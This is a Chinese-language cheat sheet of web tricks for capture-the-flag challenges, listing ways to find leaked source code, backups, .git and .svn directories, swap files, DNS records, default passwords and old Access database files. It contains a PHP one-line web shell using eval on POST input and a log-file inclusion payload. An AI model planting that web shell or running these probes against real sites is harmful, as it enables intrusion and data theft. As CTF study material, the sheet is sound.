web常用套路 |
01 默认目录获取日志
?url=/var/log/nginx/access.log
02 a sentence
<?php @eval($_POST['a']);?>
web信息泄露 |
01 源码泄露
f12
02 phps源码泄露
访问index.phps下载备份文件
03 源码压缩包泄露 (访问www.zip下载源码)
04 前台JS绕过
1.禁用JS,再查看源代码
2.在网址前加上view-source:即可查看源代码
3.ctrl+u查看源代码
05 协议头信息泄露
抓包,查看响应头,即可得到flag
06 robots后台泄露
访问robots.txt
07 Git泄露(版本控制)
访问目录url/.git/
08 SVN泄露(开放源代码的版本控制系统)
访问url/.svn即可
git与svn的区别:
1.git是分布式的,svn是集中式的
2.git将每个历史版本都存储完整的文件,svn只是存储差异的文件,历史版本不可恢复
3.git可以离线完成大部分的操作,svn不可以离线操作
4.git可以实现分支合并
5.git可以修改和撤销修改历史版本
6.git速度快,效率高
7.git有本地仓库
8.git以元数据方式存储,svn以原始文件存储
09 vim临时文件泄露
url/index.php.swp下载备份文件
10 cookie泄露
抓包查看cookie发现flag
11 域名txt记录泄露
在线DNS域名解析,即可得到flag
网站:
https://whois.chinaz.com/
http://www.jsons.cn/nslookup/
https://zijian.aliyun.com/
12 敏感信息公布
管理员常用密码 admin root...
13 内部技术文档泄露
doucument链接得到后台地址和账号密码
14 编辑器配置不当
访问url/editor
15 密码逻辑脆弱
已知信息->访问后台地址/admin
16 探针泄露
访问/tz.php
17 CDN穿透
Ping +网址
18 js敏感信息泄露
查看源文件
19 前端密钥泄露
源码密钥已知 post提交
20 数据库恶意下载
早期asp+access架构的数据库文件为db.mdb,直接查看url路径添加/db/db.mdb下载文件,用记事本打开搜索flag